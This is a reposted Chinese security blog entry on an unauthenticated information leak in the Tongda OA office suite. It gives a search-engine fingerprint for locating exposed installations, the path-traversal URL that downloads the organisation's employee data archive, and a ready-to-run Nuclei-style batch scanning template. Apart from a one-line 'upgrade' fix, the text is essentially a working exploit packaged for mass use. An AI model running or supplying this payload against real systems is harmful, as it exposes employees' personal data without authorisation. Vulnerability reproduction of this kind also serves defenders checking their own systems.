通达OA down 未授权员工信息泄露漏洞

admin 2024年4月26日09:31:53评论33 views字数 868阅读2分53秒阅读模式
 

01—漏洞描述

      通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA down 未授权员工信息泄露漏洞。
02—系统指纹

鹰图:app.name="通达 OA"

03—产品主页

通达OA down 未授权员工信息泄露漏洞

04—漏洞复现

/inc/package/down.php?id=../../../cache/org

通达OA down 未授权员工信息泄露漏洞

打开压缩包内的文件

通达OA down 未授权员工信息泄露漏洞

通达OA down 未授权员工信息泄露漏洞

05—修复建议

升级系统版本

06—批量验证脚本

id: tongda-OA-weishouquan

info:
  name: tongda-OA-weishouquan
  author: msk
  severity: high


http:
  - raw:
      - |+
        GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=gn4qfccabfl1oh5823pom8kpo2; KEY_RANDOMDATA=1510
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"org.xml")

 

 

原文始发于微信公众号(如棠安全):【漏洞复现】通达OA down 未授权员工信息泄露漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月26日09:31:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通达OA down 未授权员工信息泄露漏洞https://cn-sec.com/archives/2690348.html

发表评论

匿名网友 填写信息